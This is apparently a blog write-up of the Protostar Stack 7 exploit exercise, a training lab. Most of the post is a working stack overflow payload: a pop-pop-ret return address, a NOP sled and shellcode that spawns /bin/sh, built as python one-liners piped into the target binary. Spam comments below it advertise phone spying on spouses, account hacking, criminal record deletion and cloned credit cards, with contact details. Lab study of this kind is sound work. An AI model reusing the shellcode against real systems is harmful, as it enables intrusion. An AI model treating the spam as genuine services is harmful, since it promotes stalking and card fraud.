Exploit Exercises - Protostar Stack 7

In this level, app check return address not start with 0xbxxxxxxx. So i pop pop ret to load return address to stack, and call it.
Found pop pop ret at: 0x08048492
This payload:
| "A" * 80 | address | 8 bytes junk | | NOP to bit shifing | Shell code |
This is shell code:
\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80

Load poc to gdb, debug, break point, etc... I found nop shell start at: 0xbffff698. Ok build poc:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 +"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat)
And run it:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 + "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat) | /opt/protostar/bin/stack7

----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.

Comments

Alex said…
i strongly recommend BESTAPPSHACKERS@GMAIL.COM, last year he helped me spy on my wife when he was cheating of me, he served as a personal investigator to me by helping me spy on my wife's phone activities like facebook, email, whatsapp, calls, skype and others. am sure someone out there is looking for how to solve his relationship problems, contact him BESTAPPSHACKERS@GMAIL.COM or text him on whatsapp +1(602)-609-4730
johnny said…
Do you need to hack into any, databaseserver spy on Facebook,Emails, Whatsapp, Viber, Snapchat, Instagram and many more.
I urge you to get in touch with the best people for the job, i have confirm the service when i need to spy on my spouse phone. They are good at Phone Cloning and Bitcoin/binary minning and any other hack job.
Thanks guys for the team work HACKINTECHNOLOGYATGMAILDOTCOM
+12132951376(WHATSAPP)
ddd said…
Have you ever needed an expert when it comes to hacking? Have you ever wanted to hack someone’s email account? Recover lost accounts,school grade,boost credit score? Do you need to find a person’s sensitive information? Do you want to invade a person’s PayPal, Skrill, Amazon, Facebook or any other site account? Upgrade of University Grades,Password and email Retrieval, phone Lines monitoring, Skype Accounts, Hack Social Network, Trace calls on real time conversations, Remove Criminal Records, Credit Fixing, cyber-crime investigation, Hack Bank Accounts, Identification of Cheating Partner or employee,GET HOT STOCK TIPS Then contact contact Email:- stocktipsandethicalhacking2020@gmail.com Hangout :- stocktipsandethicalhacking2020@gmail.com Telegram Number +14242742967 Business Whatsapp :- ‪ 1 (925) 291-0054‬) Text Message/Call: ‪ +1 424) 274 2967‬‬ or click on this link to chat on whatsapp https://wa.me/message/REE2BBXU4CEYF1
Lawrence Liam said…
Email:Creditcards.atm@gmail.com   
WhatsApp:+1(305) 330-3282     
-hack into any kind of phone
_Increase Credit Scores
_western union, bitcoin and money gram hacking
_criminal records deletion_BLANK ATM/CREDIT CARDS
_Hacking of phones(that of your spouse, boss, friends, and see whatever is being discussed behind your back)
_Security system hacking...and so much more. Contact THEM now and get whatever you want at  

Prices for clone cards with their balance that we offer:


* Gold VISA- € 450 ----> Balance € 250,000 Daily withdrawal of € 1,500, validity 24 months

* Gold Mastercard- € 500 --- -> Balance € 325,000 Daily withdrawal of € 1,800, validity 36 months

* Platinum Visa - € 550 ----> Balance € 480,000 Daily withdrawal of € 2,000, validity 24 months

* Platinum Mastercard - € 600 ----> Balance € 620,000 Daily withdrawal of € 2,500, validity 36 months

* Infinity Visa - € 750 ----> Balance € 750,000 Daily withdrawal of € 3,000, validity 24 months

* Infinity Mastercard - 850 € ----> Balance 850,000 € Daily withdrawal of 3500 €, validity 36 months

Once payment has been made 12h to 48h in Europe and 12h to 72H worldwide
After your order will be available, at the delivery address given.
Shipping is by courier with parcel tracking within 2hrs after payment

If you order regularly with us, we guarantee that you will not miss anything in the near future.
 
Email:Creditcards.atm@gmail.com   
WhatsApp:+1(305) 330-3282      

✔✔✔ ✔©®™ ‍ ‍ ‍
Unknown said…
I strongly recommend cyb3rdroid.com, last year he helped me spy on my wife when he was cheating of me, he served as a personal investigator to me by helping me spy on my wife's phone activities like facebook, email, whatsapp, calls, skype and others. am sure someone out there is looking for how to solve his relationship problems, contact him cyb3rdroid@protonmail.com

Popular posts from this blog

Python - Multithread to read one file

An toàn thông tin ứng dụng Web

OpenCA tutorial